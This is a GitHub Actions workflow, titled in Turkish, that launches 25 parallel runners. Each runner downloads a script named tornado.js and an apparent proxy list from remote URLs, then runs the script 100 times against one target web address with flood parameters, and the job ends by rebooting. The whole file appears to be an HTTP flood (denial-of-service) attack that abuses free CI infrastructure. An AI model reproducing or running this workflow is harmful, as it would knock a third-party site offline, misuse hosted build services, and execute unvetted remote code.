name: Ubuntu VDS 50 saniye tornad

on:
  workflow_dispatch:

jobs:
  vds:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 25
      matrix:
        instance: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25]


    steps:
      - name: OK !
        run: |
          wget https://github.com/kaneious/tornado/raw/refs/heads/main/tornado.js
          wget https://curl.by/2lW74/fres.txt
          npm i hpack
          chmod +x tornado.js
          PIDS=()
          for i in {1..100}; do
            timeout 250 node tornado.js GET https://rapidis.gay/5043021917-79a94eff-2b04-4f71-b03f-2f1cb218b436 250 32 90 fres.txt --full --query 3
            PIDS+=($!)
          done
          
          for pid in "${PIDS[@]}"; do
            wait $pid
          done

      - name: OK !
        run: sleep 250
        
      - name: OK !
        run: sudo reboot
